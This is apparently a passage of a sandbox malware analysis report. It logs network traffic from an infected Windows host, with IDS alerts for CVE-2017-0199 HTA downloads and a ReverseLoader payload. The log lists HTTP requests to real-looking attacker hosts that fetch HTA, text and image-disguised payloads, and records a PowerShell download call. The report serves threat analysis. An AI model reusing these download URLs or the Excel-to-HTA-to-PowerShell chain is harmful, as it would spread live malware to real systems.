              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49166
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49166 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.245.123.12:80
              Source: global trafficTCP traffic: 172.245.123.12:80 -> 192.168.2.22:49167

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.12:80 -> 192.168.2.22:49166
              Source: Network trafficSuricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.12:80 -> 192.168.2.22:49164
              Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.22:49167 -> 172.245.123.12:80
              Source: Network trafficSuricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.77:443 -> 192.168.2.22:49168
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /361/TELNERA.txt HTTP/1.1Host: 172.245.123.12Connection: Keep-Alive
              Source: Joe Sandbox ViewASN Name: HUMBER-COLLEGECA HUMBER-COLLEGECA
              Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
              Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
              Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.12:80
              Source: Network trafficSuricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.12:80
              Source: global trafficHTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /361/sen/seemebestgoodluckthings.hta HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=9228-Connection: Keep-AliveHost: 172.245.123.12If-Range: "26f35-6283fd0da12d9"
              Source: global trafficHTTP traffic detected: GET /361/seemebestthingsentirelifegivenbackwithgood.tIF HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.12Connection: Keep-Alive
              Source: unknownHTTPS traffic detected: 142.215.209.77:443 -> 192.168.2.22:49168 version: TLS 1.0
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.12
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_000007FE899A7018 URLDownloadToFileW,8_2_000007FE899A7018
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DC3D3040.emfJump to behavior
              Source: global trafficHTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /fhq3w8?&pupil=gigantic&antechamber=substantial&rub=quick&sideboard=divergent&petticoat HTTP/1.1Accept: */*Accept-Language: fr-FRUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: linkjago.meConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /api/file/get?filekey=HTUG_EyruDR0OAZH0HHJyepUrXSvF_i6j8bweTeWBCu19xcbjQN5Tksa4OG0MqccqWNLlg&pk_vid=e0109638c9bfb9571732794356a1ff6c HTTP/1.1Host: 1016.filemail.comConnection: Keep-Alive
